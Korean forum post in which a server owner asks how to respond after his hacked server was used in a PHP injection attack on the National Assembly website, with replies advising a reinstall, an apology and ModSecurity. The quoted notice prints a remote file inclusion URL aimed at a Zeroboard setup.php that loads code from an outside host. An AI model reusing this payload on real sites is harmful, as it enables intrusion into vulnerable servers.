저는 해킹시도한적이 없는데 누가 제서버를 거쳐서 아래와 같이 공격을 시도해서
제가 해킹한걸로 오해를 받고 있습니다.
이거 어떻게 대처해야 될까요?
로그 분석 방법과 재발 대처방법에 대하여 조언을 부탁드립니다(__)
-------------------------------------------------------
KT 스팸대응센터
Tel : 080-223-xxx
E-mail : ***@******.net
----- Original Message -----
From: 국회보안관제센터
To: ***@******.net ; ***@******.net ; ***@*****.kornet.net
Sent: Friday, January 08, 2010 5:07 AM
Subject: KT에 할당된 아이피에서 침해시도가 발생 하였습니다. -국회보안관제센터-
안녕하십니까.
국회 보안관제센터입니다.
KT에 할당된 아이피 125.141.91.xxx에서 국회 웹서버로 PHP injection 공격이 발생 했습니다.
-일시 2010년 1월 8일 오전 3시 6분경
-src IP : 125.141.91.xxx
-dst IP : 211.46.92.xxx
-공격 내용 : PHP인젝션
-공격URL = www.***.go.kr/renew07/anc/notice/popup_mng/popup_vw.j&hellip://skin/sirini_simplism_gallery_v4/setup.php?dir=http://musicadelibreria.net/footer??
상기 내역은 보안상 로그중 일부만 발췌하여 공개 하였으며, src IP에 대해 80포트로 접속 해 본 결과
웹서버로 확인되어 해당 아이피에 대해 차단 하였습니다.
조치 후 회신 요청 드립니다.
수고하십시요.
국회 보안관제센터
02-786-xxxx
도움은 못되어 드리지만 잘 해결되길 겁니다.
일단 시스템 뚫렸으니 서버가 무결성이 없는 상태입니다.
시스템을 최신 업데이트로 새로 설치하세요.
그리고 서버 보안상 문제발생으로 인한 사고였으며, 미안하며, 즉각 보안조치를 취하였고 , 향후 재발생되지 않도록 하겠다 라는 내용으로 회신해주면 됩니다.
제로보드 보안 강화하시거나, 업그레이드 하셔야되겠네요. zero v4는 정말 문제 많습니다. 악용소지..
웹서버 인젝션 공격에 대응하시려면, 웹서버 Firewall ModSecurity를 잘 활용하시는것도 한방법입니다.
http://www.modsecurity.org/documentation/
서버 기본 보안도 철저히 하셔야 누명쓰는 일이 없습니다.